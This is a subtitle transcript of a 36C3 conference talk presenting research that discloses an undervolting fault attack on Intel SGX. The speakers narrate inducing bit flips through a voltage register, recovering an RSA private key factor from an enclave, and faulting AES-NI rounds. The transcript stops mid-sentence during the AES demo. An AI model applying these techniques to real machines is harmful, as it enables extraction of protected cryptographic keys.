1
00:00:20,400 --> 00:00:21,600
36C3 preroll music
2
00:00:21,600 --> 00:00:24,840
Herald Angel: OK. Welcome to our next
talk. It's called flipping bits from
3
00:00:24,840 --> 00:00:30,090
software without Row hammer, small
reminder Row hammer used, still is a
4
00:00:30,090 --> 00:00:34,020
software based fault attack. It was
published in 2015. There were
5
00:00:34,020 --> 00:00:39,660
countermeasures developed and we are still
in the process of deploying these
6
00:00:39,660 --> 00:00:45,690
everywhere. And now our two speakers are
going to talk about a new software based
7
00:00:45,690 --> 00:00:56,250
fault attack to execute commands inside
the SGX environment. Our speakers,
8
00:00:56,250 --> 00:01:05,000
Professor Daniel Gruss from the University
of Graz and Kit Murdoch researching at the
9
00:01:05,000 --> 00:01:10,750
University of Birmingham. The content of
this talk is actually in her first
10
00:01:10,750 --> 00:01:17,030
published paper published at IEEE, no
accepted at IEEE Security and Privacy next
11
00:01:17,030 --> 00:01:21,210
year. In case you do not come from the
academic world, if this is your this is
12
00:01:21,210 --> 00:01:22,980
always a big deal. If this is your first
paper, it even more is, please welcome
13
00:01:22,980 --> 00:01:28,000
them, both of you get a round of applause
and enjoy the talk.
14
00:01:28,000 --> 00:01:31,190
Applause
15
00:01:31,190 --> 00:01:38,030
Kit Murdoch: Thank you. Hello. Let's get
started. This is my favorite recent
16
00:01:38,030 --> 00:01:45,270
attack. It's called Clockscrew. And the
reason that it's my favorite is it created
17
00:01:45,270 --> 00:01:50,140
a new class of fault attacks. Daniel
Gruss: Fault attacks. I, I know that.
18
00:01:50,140 --> 00:01:53,670
Fault attacks, you take these
oscilloscopes and check the voltage line
19
00:01:53,670 --> 00:01:58,340
and then you drop the voltage for a f....
Kit: No, you see, this is why this one is
20
00:01:58,340 --> 00:02:04,810
cool because you don't need any equipment
at all. Adrian Tang. He created this
21
00:02:04,810 --> 00:02:09,700
wonderful attack that uses DVFS. What is
that?
22
00:02:09,700 --> 00:02:13,400
Daniel: DVFS ? I don't know, don't
violate format specifications.
23
00:02:13,400 --> 00:02:19,230
Kit: I asked my boyfriend this morning
what he thought DVFS stood for and he said
24
00:02:19,230 --> 00:02:22,230
Darth Vader fights Skywalker.
Laughter
25
00:02:22,230 --> 00:02:26,290
Kit: I'm also wearing his t-shirt
specially for him as well.
26
00:02:26,290 --> 00:02:30,340
Daniel: Maybe, maybe this is more
technical, maybe dazzling volt for
27
00:02:30,340 --> 00:02:34,590
security like SGX.
Kit: No, it's not that either. Mine was,
28
00:02:34,590 --> 00:02:39,650
the one I came up this morning was: Drink
vodka feel silly.
29
00:02:39,650 --> 00:02:42,930
Laughter
Kit: It's not that either. It stands for
30
00:02:42,930 --> 00:02:48,590
dynamic voltage and frequency scaling. And
what that means really simply is changing
31
00:02:48,590 --> 00:02:53,081
the voltage and changing the frequency of
your CPU. Why do you want to do this? Why
32
00:02:53,081 --> 00:02:58,269
would anyone want to do this? Well, gamers
want fast computers. I am sure there are a
33
00:02:58,269 --> 00:03:02,860
few people out here who will want a really
fast computer. Cloud Servers want high
34
00:03:02,860 --> 00:03:07,750
assurance and low running costs. And what
do you do if your hardware gets hot?
35
00:03:07,750 --> 00:03:13,040
You're going to need to modify them. And
actually finding a voltage and frequency
36
00:03:13,040 --> 00:03:17,810
that work together is pretty difficult.
And so what the manufacturers have done to
37
00:03:17,810 --> 00:03:23,230
make this easier, is they've created a way
to do this from software. They created
38
00:03:23,230 --> 00:03:29,409
memory mapped registers. You modify this
from software and it has an impact on the
39
00:03:29,409 --> 00:03:35,069
hardware. And that's what this wonderful
clockscrew attack did. But they found
40
00:03:35,069 --> 00:03:41,939
something else out, which is you may have
heard of: trust zone. Trust zone is in an
41
00:03:41,939 --> 00:03:47,850
enclave in ARM chips that should be able
to protect your data. But if you can
42
00:03:47,850 --> 00:03:52,360
modify the frequency and voltage of the
whole core, then you can modify it for
43
00:03:52,360 --> 00:03:59,219
both trust zone and normal code. And this
is their attack. In software they modified
44
00:03:59,219 --> 00:04:05,290
the frequency to make it outside of the
normal operating range. And they induced
45
00:04:05,290 --> 00:04:12,459
faults. And so in an arm chip running on a
mobile phone, they managed to get out an
46
00:04:12,459 --> 00:04:17,511
AES key from within trust zone. They
should not be able to do that. They were
47
00:04:17,511 --> 00:04:22,710
able to trick trust zone into loading a
self-signed app. You should not be able to
48
00:04:22,710 --> 00:04:31,900
do that. That made this ARM attack really
interesting. This year another attack came
49
00:04:31,900 --> 00:04:39,879
out called volt jockey. This also attacked
ARM chips. But instead of looking at
50
00:04:39,879 --> 00:04:49,460
frequency on ARM chips, they were looking
at voltage on ARM chips. We're thinking,
51
00:04:49,460 --> 00:04:57,270
what about Intel?
Daniel: OK, so Intel. Actually, I know
52
00:04:57,270 --> 00:05:02,060
something about Intel because I had this
nice laptop from HP. I really liked it,
53
00:05:02,060 --> 00:05:06,520
but it had this problem that it was going
too hot all the time and I couldn't even
54
00:05:06,520 --> 00:05:12,909
work without it shutting down all the time
because of the heat problem. So what I did
55
00:05:12,909 --> 00:05:17,639
was I undervolted the CPU and actually
this worked for me for several years. I
56
00:05:17,639 --> 00:05:21,530
used this undervolted for several years.
You can also see this, I just took this
57
00:05:21,530 --> 00:05:27,020
from somewhere on the Internet and they
compared with undervolting and without
58
00:05:27,020 --> 00:05:31,930
undervolting. And you can see that the
benchmark score improves by undervolting
59
00:05:31,930 --> 00:05:38,879
because you don't run into the thermal
throttling that often. So there are
60
00:05:38,879 --> 00:05:43,840
different tools to do that. On Windows you
could use RMClock, there's also
61
00:05:43,840 --> 00:05:47,789
Throttlestop. On Linux there's the Linux-
intel-undervolt GitHub repository.
62
00:05:47,789 --> 00:05:52,960
Kit: And there's one more, actually.
Adrian Tang, who I don't know if you know
63
00:05:52,960 --> 00:05:58,889
a bit of a fan. He was the lead author on
Clocks Screw. He wrote his PhD Thesis and
64
00:05:58,889 --> 00:06:03,210
in the appendix he talked about
undervolting on Intel machines and how you
65
00:06:03,210 --> 00:06:07,550
do it. And I wish I'd read that before I
started the paper. That would have saved
66
00:06:07,550 --> 00:06:12,409
an awful lot of time. But thank you to the
people on the Internet for making my life
67
00:06:12,409 --> 00:06:17,980
a lot easier, because what we discovered
was there is this magic module specific
68
00:06:17,980 --> 00:06:26,880
register and it's called Hex 150. And this
enables you to change the voltage the
69
00:06:26,880 --> 00:06:31,229
people on the Internet did the work for
me. So I know how it works. You first of
70
00:06:31,229 --> 00:06:37,039
all tell it the plain RDX, what it is you
want to, raise the voltage or lower the
71
00:06:37,039 --> 00:06:43,099
voltage. We discovered that the core and
the cache are on the same plane. So you
72
00:06:43,099 --> 00:06:46,509
have to modify them both. But it has no
effect, they're together. I guess in the
73
00:06:46,509 --> 00:06:50,750
future they'll be separate. Then you
modify the offset to say, I want to raise
74
00:06:50,750 --> 00:06:57,080
it by this much or lower it by this much.
So I thought, let's have a go. Let's write
75
00:06:57,080 --> 00:07:05,599
a little bit of code. Here is the code.
The smart people amongst you may have
76
00:07:05,599 --> 00:07:15,539
noticed something. I suspect even my
appalling C, even I would recognize that
77
00:07:15,539 --> 00:07:20,810
that loop should never exit. I'm just
multiplying the same thing again and again
78
00:07:20,810 --> 00:07:25,499
and again and again and again and
expecting it to exit. That shouldn't
79
00:07:25,499 --> 00:07:32,439
happen. But let's look at what happened.
So I'm gonna show you what I did. Oh..
80
00:07:32,439 --> 00:07:41,620
There we go. So the first thing I'm gonna
do is I'm going to set the frequency to be
81
00:07:41,620 --> 00:07:45,749
one thing because I'm gonna play with
voltage and if I'm gonna play with
82
00:07:45,749 --> 00:07:51,210
voltage, I want the frequency to be
set. So, It's quite easy using cpupower,
83
00:07:51,210 --> 00:07:56,530
you set the maximum and the minimum to be
1 gigahertz. And now my machine is running
84
00:07:56,530 --> 00:08:01,169
at exactly 1 gigahertz. Now we'll look at
the bit of code that you need to
85
00:08:01,169 --> 00:08:05,091
undervolt, again I didn't do the work,
thank you to the people on the internet
86
00:08:05,091 --> 00:08:12,199
for doing this. You put the MSR into the
kernel and let's have a look at the code.
87
00:08:12,199 --> 00:08:21,030
Does that look right? Oh, it does, looks
much better up there. Yes, it's that one
88
00:08:21,030 --> 00:08:27,061
line of code. That is the one line of code
you need to open and then we're going to
89
00:08:27,061 --> 00:08:33,140
write to it. And again, oh why is it doing
that? We have a touch sensitive screen
90
00:08:33,140 --> 00:08:52,670
here. Might touch it again. That's the
line of code that's gonna open it and
91
00:08:52,670 --> 00:08:55,970
that's how you write to it. And again, the
people on the Internet did the work for me
92
00:08:55,970 --> 00:08:59,030
and told me how I had to write that. So
what I can do here is I'm just going to
93
00:08:59,030 --> 00:09:04,250
undervolt and I'm gonna undervolt,
multiplying deadbeef by this really big
94
00:09:04,250 --> 00:09:08,660
number. I'm starting at minus two hundred
and fifty two millivolts. And we're just
95
00:09:08,660 --> 00:09:11,140
going to see if I ever get out of this
loop.
96
00:09:11,140 --> 00:09:14,020
Daniel: But surely the system would just
crash, right?
97
00:09:14,020 --> 00:09:21,880
Kit: You'd hope so, wouldn't you? Let's
see, there we go! We got a fault. I was a
98
00:09:21,880 --> 00:09:25,070
bit gobsmacked when that happened because
the system didn't crash.
99
00:09:25,070 --> 00:09:29,790
Daniel: So that doesn't look too good. So
the question now is, what is the... So you
100
00:09:29,790 --> 00:09:33,050
show some voltage here, some undervolting.
Kit: Yeah
101
00:09:33,050 --> 00:09:36,690
Daniel: What undervolting is actually
required to get a bit flip?
102
00:09:36,690 --> 00:09:40,760
Kit: We did a lot of tests. We didn't just
multiply by deadbeef. We also multiplied
103
00:09:40,760 --> 00:09:44,860
by random numbers. So here I'm going to
just generate two random numbers. One is
104
00:09:44,860 --> 00:09:50,210
going up to f f f f f f one is going up to
ff. I'm just going to try different, again
105
00:09:50,210 --> 00:09:57,450
I'm going to try undervolting to see if I
get different bit flips. And again, I got
106
00:09:57,450 --> 00:10:03,620
the same bit flipped, so I'm getting the
same one single bit flip there. Okay, so
107
00:10:03,620 --> 00:10:08,000
maybe it's only ever going to be one bit
flip. Ah, I got a different bit flip and
108
00:10:08,000 --> 00:10:12,210
again a different bit flip and it's,
you'll notice they always appear to be
109
00:10:12,210 --> 00:10:17,060
bits together next to one another. So to
answer Daniel's question, I pressed my
110
00:10:17,060 --> 00:10:22,980
machine a lot in the process of doing
this, but I wanted to know what were good
111
00:10:22,980 --> 00:10:29,330
values to undervolt at. And here they are.
We tried for all the frequencies. We tried
112
00:10:29,330 --> 00:10:33,290
what was the base voltage? And then when
was the point at which we got the first
113
00:10:33,290 --> 00:10:37,530
fault? And once we'd done that, it made
everything really easy. We just made sure
114
00:10:37,530 --> 00:10:41,430
we didn't go under that and ended up with
a kernel panic or the machine crashing.
115
00:10:41,430 --> 00:10:47,160
Daniel: So this is already great. I think
this looks like it is exploitable and the
116
00:10:47,160 --> 00:10:53,910
first thing that you need when you are
working on a vulnerability is the name and
117
00:10:53,910 --> 00:11:00,821
the logo and maybe a Website. Everything
like that. And real people on the Internet
118
00:11:00,821 --> 00:11:05,690
agree with me. Like this tweet.
Laughter
119
00:11:05,690 --> 00:11:12,160
Daniel: Yes. So we need a name and a logo.
Kit: No, no, we don't need it. Come on.
120
00:11:12,160 --> 00:11:15,121
then. Go on then. What is your idea?
Daniel: So I thought this is like, it's
121
00:11:15,121 --> 00:11:20,920
like Row hammer. We are flipping bits, but
with voltage. So I called it Volt hammer
122
00:11:20,920 --> 00:11:25,370
and I already have a logo for it.
Kit: We're not, we're not giving it a
123
00:11:25,370 --> 00:11:27,580
logo.
Daniel: No, I think we need a logo because
124
00:11:27,580 --> 00:11:34,880
people can relate more to the images
there, to the logo that we have. Reading a
125
00:11:34,880 --> 00:11:39,140
word is much more complicated than seeing
a logo somewhere. It's better for
126
00:11:39,140 --> 00:11:45,480
communication. You make it easier to talk
about your vulnerability. Yeah? And the
127
00:11:45,480 --> 00:11:50,070
name, same thing. How, how would you like
to call it? Like undervolting on Intel to
128
00:11:50,070 --> 00:11:54,350
induce flips in multiplications to then
run an exploit? No, that's not a good
129
00:11:54,350 --> 00:12:02,250
vulnerability name. And speaking of the
name, if we choose a fancy name, we might
130
00:12:02,250 --> 00:12:05,550
even make it into TV shows like Row
hammer.
131
00:12:05,550 --> 00:12:11,740
Video Clip 1A: The hacker used a DRAM Row
hammer exploit to gain kernel privileges.
132
00:12:11,740 --> 00:12:15,050
Video Clip 1B: HQ, yeah we've got
something.
133
00:12:15,050 --> 00:12:20,690
Daniel: So this was in designated Survivor
in March 2018 and this guy just got shot.
134
00:12:20,690 --> 00:12:25,601
So hopefully we won't get shot but
actually we have also been working. So my
135
00:12:25,601 --> 00:12:32,830
group has been working on Row hammer and
presented this in 2015 here at CCC, in
136
00:12:32,830 --> 00:12:37,500
Hamburg back then. It was Row hammer JS
and we called it root privileges for web
137
00:12:37,500 --> 00:12:40,661
apps because we showed that you can do
this from JavaScript in a browser. Looks
138
00:12:40,661 --> 00:12:44,170
pretty much like this, we hammered the
memory a bit and then we see a bit flips
139
00:12:44,170 --> 00:12:49,690
in the memory. So how does this work?
Because maybe for another fault attack,
140
00:12:49,690 --> 00:12:52,800
software based fault attack, the only
other software based fault attack that we
141
00:12:52,800 --> 00:12:59,370
know. So, these are related to DFS and
this is a different effect. So what do we
142
00:12:59,370 --> 00:13:03,870
do here is we look at the DRAM and the
DRAM is organized in multiple rows and we
143
00:13:03,870 --> 00:13:10,050
will access these rows. These rows consist
of so-called cells, which are capacitors
144
00:13:10,050 --> 00:13:14,450
and transistors each. And they store one
bit of information each. And the row
145
00:13:14,450 --> 00:13:18,320
buffer, the row size usually is something
like eight kilobytes. And then when you
146
00:13:18,320 --> 00:13:21,970
read something, you copy it to the row
buffer. So it works pretty much like this:
147
00:13:21,970 --> 00:13:25,820
You read from a row, you copy it to the
row buffer. The problem now is, these
148
00:13:25,820 --> 00:13:31,000
capacitors leak over time so you need to
refresh them frequently. And they have
149
00:13:31,000 --> 00:13:37,660
also a maximum refresh interval defined in
a standard to guarantee data integrity.
150
00:13:37,660 --> 00:13:43,150
Now the problem is that cells leak fast
upon proximate accesses, and that means if
151
00:13:43,150 --> 00:13:49,450
you access two locations in proximity to a
third location, then the third location
152
00:13:49,450 --> 00:13:54,110
might flip a bit without accessing it. And
this has been exploited in different
153
00:13:54,110 --> 00:13:58,710
exploits. So the usual strategies is
maybe, maybe we can use some of them. So
154
00:13:58,710 --> 00:14:03,370
the usual strategies here are searching
for a page with a bit flip. So you search
155
00:14:03,370 --> 00:14:08,230
for it and then you find some. Ah, There
is a flip here. Then you release the page
156
00:14:08,230 --> 00:14:13,180
with the flip in the next step. Now this
memory is free and now you allocate a lot
157
00:14:13,180 --> 00:14:17,710
of target pages, for instance, page
tables, and then you hope that the target
158
00:14:17,710 --> 00:14:22,460
page is placed there. If it's a page
table, for instance, like this and you
159
00:14:22,460 --> 00:14:26,650
induce a bit flip. So before it was
pointing to User page, then it was
160
00:14:26,650 --> 00:14:32,540
pointing to no page at all because we
maybe unmapped it. And the page that we
161
00:14:32,540 --> 00:14:37,850
use the bit flip now is actually the one
storing all of the PTEs here. So the one
162
00:14:37,850 --> 00:14:42,990
in the middle is stored down there. And
this one now has a bit flip and then our
163
00:14:42,990 --> 00:14:49,650
pointer to our own user page changes due
to the big flip and points to hopefully
164
00:14:49,650 --> 00:14:54,990
another page table because we filled that
memory with page tables. Another direction
165
00:14:54,990 --> 00:15:01,840
that we could go here is flipping bits in
code. For instance, if you think about a
166
00:15:01,840 --> 00:15:07,370
password comparison, you might have a jump
equal check here and the jump equal check
167
00:15:07,370 --> 00:15:13,190
if you flip one bit, it transforms into a
different instruction. And fortunately, oh
168
00:15:13,190 --> 00:15:18,290
this already looks interesting. Ah,
Perfect. Changing the password check nto a
169
00:15:18,290 --> 00:15:25,670
password incorrect check. I will always be
root. And yeah, that's basically it. So
170
00:15:25,670 --> 00:15:30,700
these are two directions that we might
look at for Row hammer. That's also maybe
171
00:15:30,700 --> 00:15:35,030
a question for Row hammer, why would we
even care about other fault attacks?
172
00:15:35,030 --> 00:15:39,820
Because Row hammer works on DDR 3, it
works on DDR 4, it works on ECC memory.
173
00:15:39,820 --> 00:15:47,840
Kit: Does it, how does it deal with SGX?
Daniel: Ahh yeah, yeah SGX. Ehh, yes. So
174
00:15:47,840 --> 00:15:51,420
maybe we should first explain what SGX is.
Kit: Yeah, go for it.
175
00:15:51,420 --> 00:15:56,530
Daniel: SGX is a so-called TEE trusted
execution environment on Intel processors
176
00:15:56,530 --> 00:16:01,660
and Intel designed it this way that you
have an untrusted part and this runs on
177
00:16:01,660 --> 00:16:05,880
top of an operating system, inside an
application. And inside the application
178
00:16:05,880 --> 00:16:10,660
you can now create an enclave and the
enclave runs in a trusted part, which is
179
00:16:10,660 --> 00:16:16,790
supported by the hardware. The hardware is
the trust anchor for this trusted enclave
180
00:16:16,790 --> 00:16:20,040
and the enclave, now you can from the
untrusted part, you can call into the
181
00:16:20,040 --> 00:16:24,910
enclave via a Callgate pretty much like a
system call. And in there you execute a
182
00:16:24,910 --> 00:16:31,670
trusted function. Then you return to this
untrusted part and then you can continue
183
00:16:31,670 --> 00:16:35,330
doing other stuff. And the operating
system has no direct access to this
184
00:16:35,330 --> 00:16:40,020
trusted part. This is also protected
against all kinds of other attacks. For
185
00:16:40,020 --> 00:16:44,290
instance, physical attacks. If you look at
the memory that it uses, maybe I have 16
186
00:16:44,290 --> 00:16:50,100
gigabytes of RAM. Then there is a small
region for the EPC, the enclave page
187
00:16:50,100 --> 00:16:55,040
cache, the memory that enclaves use and
it's encrypted and integrity protected and
188
00:16:55,040 --> 00:16:59,500
I can't tamper with it. So for instance,
if I want to mount a cold boot attack,
189
00:16:59,500 --> 00:17:04,350
pull out the DRAM, put it in another
machine and read out what content it has.
190
00:17:04,350 --> 00:17:07,970
I can't do that because it's encrypted.
And I don't have the key. The key is in
191
00:17:07,970 --> 00:17:14,939
the processor quite bad. So, what happens
if we have bit flips in the EPC? Good
192
00:17:14,939 --> 00:17:21,839
question. We tried that. The integrity
check fails. It locks up the memory
193
00:17:21,839 --> 00:17:27,280
controller, which means no further memory
accesses whatsoever run through this
194
00:17:27,280 --> 00:17:33,990
system. Everything stays where it is and
the system halts basically. It's no
195
00:17:33,990 --> 00:17:41,420
exploit, it's just denial of service.
Kit: Huh. So maybe SGX can save us. So
196
00:17:41,420 --> 00:17:47,360
what I want to know is, Row Hammer clearly
failed because of the integrity check. Is
197
00:17:47,360 --> 00:17:51,830
my attack where I can flip bits. Is this
gonna work inside SGX?
198
00:17:51,830 --> 00:17:55,040
Daniel: I don't think so because they
have integrity protection, right?
199
00:17:55,040 --> 00:17:59,540
Kit: So what I'm gonna do is run the same
thing in the right hand side is user
200
00:17:59,540 --> 00:18:03,750
space. In the left hand side is the
enclave. As you can see, I'm running at
201
00:18:03,750 --> 00:18:12,280
minus 261 millivolts. No error minus 262.
No error minus 2... fingers crossed we
202
00:18:12,280 --> 00:18:20,920
don't get a kernel panic. Do you see that
thing at the bottom? That's a bit flip
203
00:18:20,920 --> 00:18:24,760
inside the enclave. Oh, yeah.
Daniel: That's bad.
204
00:18:24,760 --> 00:18:29,910
Applause
Kit: Thank you. Yeah and it's the same
205
00:18:29,910 --> 00:18:33,920
bit flip that I was getting in user space
, that is also really interesting.
206
00:18:33,920 --> 00:18:38,251
Daniel: I have an idea. So, it's
surprising that it works right. But I have
207
00:18:38,251 --> 00:18:45,080
an idea. This is basically doing the same
thing as clocks group. But on SGX, right?
208
00:18:45,080 --> 00:18:47,320
Kit: Yeah.
Daniel: And I thought maybe you didn't
209
00:18:47,320 --> 00:18:51,570
like the previous logo, maybe it was just
too much. So I came up with something more
210
00:18:51,570 --> 00:18:52,800
simple...
Kit: You've come up with a new... He's
211
00:18:52,800 --> 00:18:55,790
come up with a new name.
Daniel: Yes, SGX Screw. How do you like
212
00:18:55,790 --> 00:18:59,001
it?
Kit: No, we don't even have an attack. We
213
00:18:59,001 --> 00:19:02,150
can't have a logo before we have an
attack.
214
00:19:02,150 --> 00:19:07,350
Daniel: The logo is important, right? I
mean, how would you present this on a
215
00:19:07,350 --> 00:19:08,670
website
without a logo?
216
00:19:08,670 --> 00:19:11,770
Kit: Well, first of all, I need an attack.
What am I going to attack with this?
217
00:19:11,770 --> 00:19:15,060
Daniel: I have an idea what we could
attack. So, for instance, we could attack
218
00:19:15,060 --> 00:19:22,300
crypto, RSA. RSA is a crypto algorithm.
It's a public key crypto algorithm. And
219
00:19:22,300 --> 00:19:28,280
you can encrypt or sign messages. You can
send this over an untrusted channel. And
220
00:19:28,280 --> 00:19:35,560
then you can also verify. So this is
actually a typo which should be decrypt...
221
00:19:35,560 --> 00:19:43,230
there, encrypt verifying messages with a
public key or decrypt sign messages with a
222
00:19:43,230 --> 00:19:53,590
private key. So how does this work? Yeah,
basically it's based on exponention modulo a
223
00:19:53,590 --> 00:20:01,270
number and this number is computed from
two prime numbers. So you, for the
224
00:20:01,270 --> 00:20:09,360
signature part, which is similar to the
decryption basically, you take the hash of
225
00:20:09,360 --> 00:20:17,760
the message and then take it to the power
of d modulo n, the public modulus, and
226
00:20:17,760 --> 00:20:26,390
then you have the signature and everyone
can verify that this is actually, later on
227
00:20:26,390 --> 00:20:34,430
can verify this because the exponent part
is public. So n is also public so we can
228
00:20:34,430 --> 00:20:39,880
later on do this. Now there is one
optimization which is quite nice, which is
229
00:20:39,880 --> 00:20:44,541
Chinese remainder theorem. And this part
is really expensive. It takes a long time.
230
00:20:44,541 --> 00:20:51,000
So it's a lot faster, if you split this in
multiple parts. For instance, if you split
231
00:20:51,000 --> 00:20:56,320
it in two parts, you do two of those
exponentations, but with different
232
00:20:56,320 --> 00:21:02,100
numbers, with smaller numbers and then it's
cheaper. It takes fewer rounds. And if you
233
00:21:02,100 --> 00:21:06,880
do that, you of course have to adapt the
formula up here to compute the signature
234
00:21:06,880 --> 00:21:12,510
because, you now put it together out of
the two pieces of the signature that you
235
00:21:12,510 --> 00:21:19,390
compute. OK, so this looks quite
complicated, but the point is we want to
236
00:21:19,390 --> 00:21:26,690
mount a fault attack on this. So what
happens if we fault this? Let's assume we
237
00:21:26,690 --> 00:21:36,130
have two signatures which are not
identical. Right, S and S', and we
238
00:21:36,130 --> 00:21:41,120
basically only need to know that in one of
them, a fault occurred. So the first is
239
00:21:41,120 --> 00:21:45,140
something, the other is something else. We
don't care. But what you see here is that
240
00:21:45,140 --> 00:21:51,510
both are multiplied by Q plus s2. And if
you subtract one from the other, what do
241
00:21:51,510 --> 00:21:56,970
you get? You get something multiplied with
Q. There is something else that is
242
00:21:56,970 --> 00:22:03,480
multiplied with Q, which is P and n is
public. So what we can do now is we can
243
00:22:03,480 --> 00:22:09,640
compute the greatest common divisor of
this and n and get q.
244
00:22:09,640 --> 00:22:14,730
Kit: Okay. So I'm interested to see if...
I didn't understand a word of that, but
245
00:22:14,730 --> 00:22:19,890
I'm interested to see if I can use this to
mount an attack. So how am I going to do
246
00:22:19,890 --> 00:22:25,690
this? Well, I'll write a little RSA
decrypt program and what I'll do is I use
247
00:22:25,690 --> 00:22:32,330
the same bit of multiplication that I've
been using before. And when I get a bit
248
00:22:32,330 --> 00:22:39,280
flip, then I'll do the decryption. All
this is happening inside SGX, inside the
249
00:22:39,280 --> 00:22:44,141
enclave. So let's have a look at this.
First of all, I'll show you the code that
250
00:22:44,141 --> 00:22:51,580
I wrote, again copied from the Internet.
Thank you. So there it is, I'm going to
251
00:22:51,580 --> 00:22:56,380
trigger the fault.I'm going to wait for
the triggered fault, then I'm going to do
252
00:22:56,380 --> 00:23:00,870
a decryption. Well, let's have a quick
look at the code, which should be exactly
253
00:23:00,870 --> 00:23:04,970
the same as it was right at the very
beginning when we started this. Yeah.
254
00:23:04,970 --> 00:23:10,240
There's my deadbeef written slightly
differently. But there is my deadbeef. So,
255
00:23:10,240 --> 00:23:13,730
now this is ever so slightly messy on the
screen, but I hope you're going to see
256
00:23:13,730 --> 00:23:22,850
this. So minus 239. Fine. Still fine.
Still fine. I'll just pause there. You can
257
00:23:22,850 --> 00:23:27,360
see at the bottom I've written meh - all
fine., If you're wondering. So what we're
258
00:23:27,360 --> 00:23:33,059
looking at here is a correct decryption
and you can see inside the enclave, I'm
259
00:23:33,059 --> 00:23:38,340
initializing p and I'm initializing q. And
those are part of the private key. I
260
00:23:38,340 --> 00:23:43,960
shouldn't be able to get those. So 239
isn't really working. Let's try going up
261
00:23:43,960 --> 00:23:49,309
to minus 240. Oh oh oh oh! RSA error, RSA
error. Exciting!
262
00:23:49,309 --> 00:23:51,680
Daniel: Okay, So this should work for the
attack then.
263
00:23:51,680 --> 00:23:57,370
Kit: So let's have a look, again. I copied
somebodys attack on the Internet where
264
00:23:57,370 --> 00:24:04,210
they very kindly, It's called the lenstra
attack. And again, I got I got an output.
265
00:24:04,210 --> 00:24:08,150
I don't know what it is because I didn't
understand any of that crypto stuff.
266
00:24:08,150 --> 00:24:09,620
Daniel: Me neither.
Kit: But let me have a look at the source
267
00:24:09,620 --> 00:24:15,690
code and see if that exists anywhere in
the source code inside the enclave. It
268
00:24:15,690 --> 00:24:22,180
does. I found p. And if I found p, I can
find q. So just to summarise what I've
269
00:24:22,180 --> 00:24:31,830
done, from a bit flip I have got the
private key out of the SGX enclave and I
270
00:24:31,830 --> 00:24:36,130
shouldn't be able to do that.
Daniel: Yes, yes and I think I have an
271
00:24:36,130 --> 00:24:39,760
idea. So you didn't like the previous...
Kit: Ohh, I know where this is going. Yes.
272
00:24:39,760 --> 00:24:45,980
Daniel: ...didn't like the previous name.
So I came up with something more cute and
273
00:24:45,980 --> 00:24:52,740
relatable, maybe. So I thought, this is an
attack on RSA. So I called it Mufarsa.
274
00:24:52,740 --> 00:24:57,520
Laughter
Daniel: My Undervolting Fault Attack On
275
00:24:57,520 --> 00:24:59,700
RSA.
Kit: That's not even a logo. That's just a
276
00:24:59,700 --> 00:25:02,260
picture of a lion.
Daniel: Yeah, yeah it's, it's sort of...
277
00:25:02,260 --> 00:25:04,660
Kit: Disney are not going to let us use
that.
278
00:25:04,660 --> 00:25:07,429
Laughter
Kit: Well it's not, is it Star Wars? No,
279
00:25:07,429 --> 00:25:10,690
I don't know. OK. OK, so Daniel, I really
enjoyed it.
280
00:25:10,690 --> 00:25:13,670
Daniel: I don't think you will like any of
the names I suggest.
281
00:25:13,670 --> 00:25:17,940
Kit: Probably not. But I really enjoyed
breaking RSA. So what I want to know is
282
00:25:17,940 --> 00:25:19,110
what else can I break?
Daniel: Well...
283
00:25:19,110 --> 00:25:22,750
Kit: Give me something else I can break.
Daniel: If you don't like the RSA part, we
284
00:25:22,750 --> 00:25:28,300
can also take other crypto. I mean there
is AES for instance, AES is a symmetric
285
00:25:28,300 --> 00:25:33,540
key crypto algorithm. Again, you encrypt
messages, you transfer them over a public
286
00:25:33,540 --> 00:25:40,000
channel, this time with both sides having
the key. You can also use that for
287
00:25:40,000 --> 00:25:47,830
storage. AES internally uses a 4x4 state
matrix for 4x4 bytes and it runs through
288
00:25:47,830 --> 00:25:54,390
ten rounds which are S-box, which
basically replaces a byte by another byte,
289
00:25:54,390 --> 00:25:59,030
some shifting of rows in this matrix, some
mixing of the columns, and then the round
290
00:25:59,030 --> 00:26:03,150
keys is added which is computed from the
AES key that you provided to the
291
00:26:03,150 --> 00:26:08,680
algorithm. And if we look at the last
three rounds because we want to, again,
292
00:26:08,680 --> 00:26:12,090
mount a fault attack, and there are
different differential fault attacks on
293
00:26:12,090 --> 00:26:18,410
AES. If you look at the last rounds,
because the way of this algorithm works is
294
00:26:18,410 --> 00:26:22,870
it propagates, changes, differences
through this algorithm. If you'd look at
295
00:26:22,870 --> 00:26:28,300
the state matrix, which only has a
difference in the top left corner, then
296
00:26:28,300 --> 00:26:33,830
this is how the state will propagate
through the 9th and 10th round. And you
297
00:26:33,830 --> 00:26:42,470
can put up formulas to compute possible
values for the state up there. If you have
298
00:26:42,470 --> 00:26:47,760
different, if you have encryption, which
only have a difference there in exactly
299
00:26:47,760 --> 00:26:57,350
that single state byte. Now, how does this
work in practice? Well, today everyone is
300
00:26:57,350 --> 00:27:02,200
using AES-NI because that's super fast.
That's, again, an instruction set
301
00:27:02,200 --> 00:27:07,510
extension by Intel and it's super fast.
Kit: Oh okay, I want to have a go. Right,
302
00:27:07,510 --> 00:27:11,970
so let me have a look if I can break some
of these AES-NI instructions. So I'm to
303
00:27:11,970 --> 00:27:16,040
come at this slightly differently. Last
time I waited for a multiplication fault,
304
00:27:16,040 --> 00:27:19,710
I'm going to do something slightly
different. What I'm going to do is put in
305
00:27:19,710 --> 00:27:26,680
a loop two AES encryptions. And I wrote
this using Intel's code, I should say I we
306
00:27:26,680 --> 00:27:32,760
wrote this using Intel's code, example
code. This should never fault. And we know
307
00:27:32,760 --> 00:27:36,580
what we're looking for. What we're looking
for is a fault in the eighth round. So
308
00:27:36,580 --> 00:27:42,370
let's see if we get faults with this. So
the first thing is I'm going to start at
309
00:27:42,370 --> 00:27:47,510
minus 262 millivolt. What's interesting is
that you have to undervolt more when it's
310
00:27:47,510 --> 00:27:57,350
cold so you can tell at what time of day I
ran these. Oh I got a fault, I got a fault.
311
00:27:57,350 --> 00:28:01,950
Well, unfortunately. Where did that?
That's actually in the fourth round. I'm
312
00:28:01,950 --> 00:28:04,480
I'm obviously, eh fifth round, okay.
Daniel: You can't do anything with that.
313
00:28:04,480 --> 00:28:09,530
Kit: You can't do anything, again in the
fifth round. Can't do anything with that,
314
00:28:09,530 --> 00:28:14,800
fifth round again. Oh! Oh we got one. We
got one in the eighth round. And so it
315
00:28:14,800 --> 00:28:20,710
means I can take these two ciphertext and
I can use the differential fault attack. I
316
00:28:20,710 --> 00:28:26,620
actually ran this twice in order to get
two pairs of faulty output because it made
317
